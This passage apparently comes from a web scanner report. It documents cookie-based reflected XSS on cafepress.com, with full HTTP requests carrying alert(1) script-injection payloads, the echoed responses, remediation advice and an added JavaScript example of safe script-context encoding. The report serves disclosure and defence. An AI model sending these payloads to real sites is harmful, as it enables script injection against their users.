Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=71ca1</script><script>alert(1)</script>6e6e4d328ee; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59474
Date: Sun, 26 Dec 2010 13:49:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '71ca1</script><script>alert(1)</script>6e6e4d328ee'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.60. http://www.cafepress.com/+steins [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+steins

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 747f7"-alert(1)-"1bd54518006 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+steins HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 58697
Date: Sun, 26 Dec 2010 13:47:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.61. http://www.cafepress.com/+steins [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+steins

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddbad</script><script>alert(1)</script>e5bee7f619b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must reach client-side code, emit it as a JavaScript string literal with quotes, backslashes and line terminators escaped and with < and > written as \u003c and \u003e, so that a </script> inside the value cannot end the element; HTML entity encoding is the wrong tool here, since entities are not decoded inside a script element. Alternatively, place the value in an HTML attribute (HTML-encoded) and have the script read it from the DOM.

Request

GET /+steins HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ddbad</script><script>alert(1)</script>e5bee7f619b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 58719
Date: Sun, 26 Dec 2010 13:47:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/
Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'ddbad</script><script>alert(1)</script>e5bee7f619b'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.62. http://www.cafepress.com/+stocking [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+stocking

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77a9a"-alert(1)-"6b71a0eba86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. The payload's first double quote closes the string and its second reopens one, so the assignment becomes the expression "...77a9a" - alert(1) - "6b71a0eba86", which is syntactically valid and calls alert(1) while being evaluated (s.eVar30 ends up as NaN, but the call has already happened).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
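The remediation above says to avoid echoing user data in script context; where the value must be written into inline script, as s.eVar30 and tealeaf.searchTerm are in these responses, it needs an encoder that is safe for that context rather than HTML encoding. The block below is an added example, not CafePress or scanner code: it rebuilds both sinks from this report (the double-quoted s.eVar30 assignment broken by "-alert(1)-", and the single-quoted searchTerm assignment broken by </script>), first by concatenation as the responses do and then through a script-context encoder, and then splits and evaluates the result the way a browser would to show which version runs the payload. The payload strings and the eVar30 prefix are copied from the report; renderUnsafe, renderSafe, jsStringLiteral, scriptBodies and simulate are names chosen for the example.

```javascript
'use strict';
// Added example, not code from CafePress or from the scanner. It rebuilds the two
// inline-script sinks shown in this report from untrusted cookie values, first the way
// the responses do it (string concatenation) and then through a script-context encoder,
// and parses the result as a browser would to show which version runs the payload.

// Payloads and the eVar30 prefix are copied from the report entries.
const CP_V_PAYLOAD = '77a9a"-alert(1)-"6b71a0eba86';
const CP_ST_PAYLOAD = 'ddbad</script><script>alert(1)</script>e5bee7f619b';
const EVAR30_PREFIX = 'A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA';

// Vulnerable: mirrors `s.eVar30 = "<prefix><cp-v>";` and
// `window.cafepress.tealeaf.searchTerm = '<cp_st>'` from the responses.
function renderUnsafe(cpV, cpSt) {
  return '<script>\n' +
    '   s.eVar30 = "' + EVAR30_PREFIX + cpV + '";\n' +
    "   window.cafepress.tealeaf.searchTerm = '" + cpSt + "'\n" +
    '</script>';
}

// Encoder for a JS string literal that will sit inside an HTML <script> element.
// JSON.stringify escapes quotes, backslashes and control characters; the extra
// replacements cover what it leaves alone: the HTML tokenizer ends a script element at
// "</script" whatever the JS quoting state (and treats "<!--" specially), and
// U+2028/U+2029 are line terminators to older JS engines.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened: the same two assignments, every untrusted value passed through the encoder.
function renderSafe(cpV, cpSt) {
  return '<script>\n' +
    '   s.eVar30 = ' + jsStringLiteral(EVAR30_PREFIX + cpV) + ';\n' +
    '   window.cafepress.tealeaf.searchTerm = ' + jsStringLiteral(cpSt) + '\n' +
    '</script>';
}

// Split the HTML into script bodies the way the HTML tokenizer does: each element ends
// at the first "</script" after it opens, regardless of what the JavaScript looks like.
function scriptBodies(html) {
  const bodies = [];
  const re = /<script[^>]*>([\s\S]*?)<\/script/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Run each script body in a scratch scope with a recording alert(), continuing past a
// body that fails to parse (a browser skips that block and runs the next one), and
// report what the page's own code would observe afterwards.
function simulate(html) {
  const s = {};
  const win = { cafepress: { tealeaf: {} } };
  const alerts = [];
  const errors = [];
  const bodies = scriptBodies(html);
  for (const body of bodies) {
    try {
      new Function('s', 'window', 'alert', body)(s, win, (x) => alerts.push(x));
    } catch (e) {
      errors.push(e.name);
    }
  }
  return {
    scripts: bodies.length,
    alerts,
    errors,
    eVar30: s.eVar30,
    searchTerm: win.cafepress.tealeaf.searchTerm,
  };
}
```

With the cp-v payload the unsafe page stays one script block but calls alert(1) and leaves s.eVar30 as NaN; with the cp_st payload it becomes two blocks, the first a syntax error and the second the injected alert. The hardened page is one block in both cases, runs nothing injected, and hands the page exactly the cookie values it was given.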

Request

GET /+stocking HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 59606
Date: Sun, 26 Dec 2010 13:49:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/
Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.63. http://www.cafepress.com/+stocking [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+stocking

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd3b0</script><script>alert(1)</script>6a078ca5ef1 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+stocking HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cd3b0</script><script>alert(1)</script>6a078ca5ef1; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59633
Date: Sun, 26 Dec 2010 13:49:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/
Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
